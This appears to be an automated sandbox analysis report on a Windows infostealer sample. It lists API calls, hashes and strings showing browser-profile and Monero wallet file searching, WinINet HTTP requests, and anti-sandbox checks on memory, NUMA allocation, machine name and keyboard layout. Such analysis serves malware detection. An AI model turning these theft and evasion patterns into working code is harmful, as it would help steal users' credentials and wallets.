                          • Opcode Fuzzy Hash: f20ea9da08eaa489956a5a13b7fb8123f51301c86b5865823a4a9277baadca93
                          • Instruction Fuzzy Hash: 81214DB1D00209ABDF14DFA4E845ADE7B78FF44320F108625F965A72C0EB706A09CF91

                          Control-flow Graph

                          APIs
                            • Part of subcall function 0013A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0013A7E6
                            • Part of subcall function 00126280: InternetOpenA.WININET(00140DFE,00000001,00000000,00000000,00000000), ref: 001262E1
                            • Part of subcall function 00126280: StrCmpCA.SHLWAPI(?,00F0F920), ref: 00126303
                            • Part of subcall function 00126280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00126335
                            • Part of subcall function 00126280: HttpOpenRequestA.WININET(00000000,GET,?,00F0EFA8,00000000,00000000,00400100,00000000), ref: 00126385
                            • Part of subcall function 00126280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 001263BF
                            • Part of subcall function 00126280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001263D1
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00135228
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                           • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                          • String ID: ERROR$ERROR
                          • API String ID: 3287882509-2579291623
                          • Opcode ID: c793f7c4ee09193e316e1f44dca8be6265fc72a14a97ddfaf578c27e8aa22e47
                          • Instruction ID: 8d83b94216ccbabed5cbd3ed538a7aeae1920419d82aacaae602f5dc2eb57580
                          • Opcode Fuzzy Hash: c793f7c4ee09193e316e1f44dca8be6265fc72a14a97ddfaf578c27e8aa22e47
                          • Instruction Fuzzy Hash: 08111231910148BBDB14FF74ED92AED7739AF60300FC04158F85A5B592EF31AB15CA91

                           Control-flow Graph (graph image not rendered; legend: Executed / Not Executed)
                          APIs
                          • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0012123E
                          • ExitProcess.KERNEL32 ref: 00121294
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                           • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitGlobalMemoryProcessStatus
                          • String ID: @
                          • API String ID: 803317263-2766056989
                          • Opcode ID: 84f3048af2cc390b565958d990ab7cd8e5de9de882446ea23c319d0f63d03886
                          • Instruction ID: 31fa46fd4e5fc402f28a198e4cfa08a08030b633e4d02772dfe612f2155657de
                          • Opcode Fuzzy Hash: 84f3048af2cc390b565958d990ab7cd8e5de9de882446ea23c319d0f63d03886
                          • Instruction Fuzzy Hash: 97011DB0D44318FAEB10DBE4ED49BAEBB78AB24705F308048F705B62C0D7B455558B99
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00137910
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00137917
                          • GetComputerNameA.KERNEL32(?,00000104), ref: 0013792F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                           • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateComputerNameProcess
                          • String ID:
                          • API String ID: 1664310425-0
                          • Opcode ID: f224350183e7be5603a122b1e99862ea7198cfd4987cab6405a4df70a482dd9f
                          • Instruction ID: 9140dcc8c5739ed301473ee0128126c76a4c78db7c1f98bf069fc178ed9db50e
                          • Opcode Fuzzy Hash: f224350183e7be5603a122b1e99862ea7198cfd4987cab6405a4df70a482dd9f
                          • Instruction Fuzzy Hash: 010181B1A04608EBD714DF99DD45BAABBBCFB04B35F10421AFA45F7280C37459008BA2
                          APIs
                          • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0012112B
                          • VirtualAllocExNuma.KERNEL32(00000000), ref: 00121132
                          • ExitProcess.KERNEL32 ref: 00121143
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                           • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$AllocCurrentExitNumaVirtual
                          • String ID:
                          • API String ID: 1103761159-0
                          • Opcode ID: 7bd441c9996da7c3257481cb81a114f1dfd27ac2a52912b31e6c777125aa928c
                          • Instruction ID: e50794417332e81ba0d084ca16cab0facfd6ded9e8d8c312877d42d6fd822d0c
                          • Opcode Fuzzy Hash: 7bd441c9996da7c3257481cb81a114f1dfd27ac2a52912b31e6c777125aa928c
                          • Instruction Fuzzy Hash: 3DE0E671985308FBE711ABA0AC0AB097A7CEB14B01F104154F709771D0D7F526509A99
                          APIs
                          • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 001210B3
                          • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 001210F7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                           • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Virtual$AllocFree
                          • String ID:
                          • API String ID: 2087232378-0
                          • Opcode ID: 1c421bd8f8da481a94df737dfae69165ec29d1fd7962cccdb10140c783ff3785
                          • Instruction ID: 48eba0d768a20eb4d7568c3f18bd81710ebbe4bcd59b063549cf6146834fe06c
                          • Opcode Fuzzy Hash: 1c421bd8f8da481a94df737dfae69165ec29d1fd7962cccdb10140c783ff3785
                          • Instruction Fuzzy Hash: 86F0E271641318BBE714DBA4AC49FAAB7ECE705B15F305448F504E3280D672AE00CBA4
                          APIs
                            • Part of subcall function 001378E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00137910
                            • Part of subcall function 001378E0: RtlAllocateHeap.NTDLL(00000000), ref: 00137917
                            • Part of subcall function 001378E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0013792F
                            • Part of subcall function 00137850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001211B7), ref: 00137880
                            • Part of subcall function 00137850: RtlAllocateHeap.NTDLL(00000000), ref: 00137887
                            • Part of subcall function 00137850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0013789F
                          • ExitProcess.KERNEL32 ref: 001211C6
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                           • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Process$AllocateName$ComputerExitUser
                          • String ID:
                          • API String ID: 3550813701-0
                          APIs
                          • wsprintfA.USER32 ref: 001338CC
                          • FindFirstFileA.KERNEL32(?,?), ref: 001338E3
                          • lstrcat.KERNEL32(?,?), ref: 00133935
                          • StrCmpCA.SHLWAPI(?,00140F70), ref: 00133947
                          • StrCmpCA.SHLWAPI(?,00140F74), ref: 0013395D
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00133C67
                          • FindClose.KERNEL32(000000FF), ref: 00133C7C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                          • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                          • API String ID: 1125553467-2524465048
                          APIs
                            • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                            • Part of subcall function 0013A920: lstrcpy.KERNEL32(00000000,?), ref: 0013A972
                            • Part of subcall function 0013A920: lstrcat.KERNEL32(00000000), ref: 0013A982
                            • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00F09838,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                            • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                            • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                            • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                          • FindFirstFileA.KERNEL32(00000000,?,00140B32,00140B2B,00000000,?,?,?,001413F4,00140B2A), ref: 0012BEF5
                          • StrCmpCA.SHLWAPI(?,001413F8), ref: 0012BF4D
                          • StrCmpCA.SHLWAPI(?,001413FC), ref: 0012BF63
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0012C7BF
                          • FindClose.KERNEL32(000000FF), ref: 0012C7D1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                          • API String ID: 3334442632-726946144
                          APIs
                          • wsprintfA.USER32 ref: 0013492C
                          • FindFirstFileA.KERNEL32(?,?), ref: 00134943
                          • StrCmpCA.SHLWAPI(?,00140FDC), ref: 00134971
                          • StrCmpCA.SHLWAPI(?,00140FE0), ref: 00134987
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00134B7D
                          • FindClose.KERNEL32(000000FF), ref: 00134B92
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\%s$%s\%s$%s\*
                          • API String ID: 180737720-445461498
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00134580
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00134587
                          • wsprintfA.USER32 ref: 001345A6
                          • FindFirstFileA.KERNEL32(?,?), ref: 001345BD
                          • StrCmpCA.SHLWAPI(?,00140FC4), ref: 001345EB
                          • StrCmpCA.SHLWAPI(?,00140FC8), ref: 00134601
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0013468B
                          • FindClose.KERNEL32(000000FF), ref: 001346A0
                          • lstrcat.KERNEL32(?,00F0F8A0), ref: 001346C5
                          • lstrcat.KERNEL32(?,00F0E3B0), ref: 001346D8
                          • lstrlen.KERNEL32(?), ref: 001346E5
                          • lstrlen.KERNEL32(?), ref: 001346F6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                          • String ID: %s\%s$%s\*
                          • API String ID: 671575355-2848263008
                          APIs
                          • wsprintfA.USER32 ref: 00133EC3
                          • FindFirstFileA.KERNEL32(?,?), ref: 00133EDA
                          • StrCmpCA.SHLWAPI(?,00140FAC), ref: 00133F08
                          • StrCmpCA.SHLWAPI(?,00140FB0), ref: 00133F1E
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0013406C
                          • FindClose.KERNEL32(000000FF), ref: 00134081
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\%s
                          • API String ID: 180737720-4073750446
                          APIs
                          • wsprintfA.USER32 ref: 0012ED3E
                          • FindFirstFileA.KERNEL32(?,?), ref: 0012ED55
                          • StrCmpCA.SHLWAPI(?,00141538), ref: 0012EDAB
                          • StrCmpCA.SHLWAPI(?,0014153C), ref: 0012EDC1
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0012F2AE
                          • FindClose.KERNEL32(000000FF), ref: 0012F2C3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\*.*
                          • API String ID: 180737720-1013718255
                          APIs
                            • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                            • Part of subcall function 0013A920: lstrcpy.KERNEL32(00000000,?), ref: 0013A972
                            • Part of subcall function 0013A920: lstrcat.KERNEL32(00000000), ref: 0013A982
                            • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00F09838,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                            • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                            • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                            • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001415B8,00140D96), ref: 0012F71E
                          • StrCmpCA.SHLWAPI(?,001415BC), ref: 0012F76F
                          • StrCmpCA.SHLWAPI(?,001415C0), ref: 0012F785
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0012FAB1
                          • FindClose.KERNEL32(000000FF), ref: 0012FAC3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID: prefs.js
                          • API String ID: 3334442632-3783873740
                          APIs
                            • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0014510C,?,?,?,001451B4,?,?,00000000,?,00000000), ref: 00121923
                          • StrCmpCA.SHLWAPI(?,0014525C), ref: 00121973
                          • StrCmpCA.SHLWAPI(?,00145304), ref: 00121989
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00121D40
                          • DeleteFileA.KERNEL32(00000000), ref: 00121DCA
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00121E20
                          • FindClose.KERNEL32(000000FF), ref: 00121E32
                            • Part of subcall function 0013A920: lstrcpy.KERNEL32(00000000,?), ref: 0013A972
                            • Part of subcall function 0013A920: lstrcat.KERNEL32(00000000), ref: 0013A982
                            • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00F09838,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                            • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                            • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                            • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                          • String ID: \*.*
                          • API String ID: 1415058207-1173974218
                          • Opcode ID: f99f5d75bcf01a5b673af3c47d09863759ee2591229ffe56290b3f44f6aca489
                          • Instruction ID: 2f0e767cc9f86c84e1b222a25e97250bd4517097d7dad12500ab88bb0089b571
                          • Opcode Fuzzy Hash: f99f5d75bcf01a5b673af3c47d09863759ee2591229ffe56290b3f44f6aca489
                          • Instruction Fuzzy Hash: 27121071950118ABDB19FB60DC96EEE7378AF74301F8141E9B14A62091EF706F89CFA1
                          APIs
                            • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                            • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00F09838,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                            • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                            • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                            • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00140C2E), ref: 0012DE5E
                          • StrCmpCA.SHLWAPI(?,001414C8), ref: 0012DEAE
                          • StrCmpCA.SHLWAPI(?,001414CC), ref: 0012DEC4
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0012E3E0
                          • FindClose.KERNEL32(000000FF), ref: 0012E3F2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                          • String ID: \*.*
                          • API String ID: 2325840235-1173974218
                          • Opcode ID: bb9cfa99bb3e17077b6ab67fad72301c72a9bd22d1af2852b9f83ef7523fe9be
                          • Instruction ID: b32ca8458387420d4cc31cc530dfa228a954b56b575e4219828453951cda403f
                          • Opcode Fuzzy Hash: bb9cfa99bb3e17077b6ab67fad72301c72a9bd22d1af2852b9f83ef7523fe9be
                          • Instruction Fuzzy Hash: 2AF1AF71854118AADB15FB60DCA5EEE7378BF24301FC141D9B54A62091EF706F8ACF62
                          APIs
                            • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                            • Part of subcall function 0013A920: lstrcpy.KERNEL32(00000000,?), ref: 0013A972
                            • Part of subcall function 0013A920: lstrcat.KERNEL32(00000000), ref: 0013A982
                            • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00F09838,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                            • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                            • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                            • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001414B0,00140C2A), ref: 0012DAEB
                          • StrCmpCA.SHLWAPI(?,001414B4), ref: 0012DB33
                          • StrCmpCA.SHLWAPI(?,001414B8), ref: 0012DB49
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0012DDCC
                          • FindClose.KERNEL32(000000FF), ref: 0012DDDE
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID:
                          • API String ID: 3334442632-0
                          • Opcode ID: b41aacde2af924a0ed5d39114e4f0946139b15bf42bb94082186b02887cf05fb
                          • Instruction ID: 8992821018a3c80e0ae30d42c94bca7545e70e0d308c11058202c5ab4baf2c5d
                          • Opcode Fuzzy Hash: b41aacde2af924a0ed5d39114e4f0946139b15bf42bb94082186b02887cf05fb
                          • Instruction Fuzzy Hash: A0916972900114A7DB14FBB0FC96DED737DAFA4300F808558F94A96181EF349B59CB92
                          APIs
                            • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                          • GetKeyboardLayoutList.USER32(00000000,00000000,001405AF), ref: 00137BE1
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00137BF9
                          • GetKeyboardLayoutList.USER32(?,00000000), ref: 00137C0D
                          • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00137C62
                          • LocalFree.KERNEL32(00000000), ref: 00137D22
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                          • String ID: /
                          • API String ID: 3090951853-4001269591
                          • Opcode ID: 7b332f9676ed224728a506af4a4111183900368e49f1b83c2c3863dd74b536e5
                          • Instruction ID: 8a8bd31369dcb315163156ae4481430a9d1446727e92e3d38b109a533303df1f
                          • Opcode Fuzzy Hash: 7b332f9676ed224728a506af4a4111183900368e49f1b83c2c3863dd74b536e5
                          • Instruction Fuzzy Hash: 5B415CB1940218ABDB24DB94DC99BEEB7B8FF58700F6041D9E10972291DB742F85CFA1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
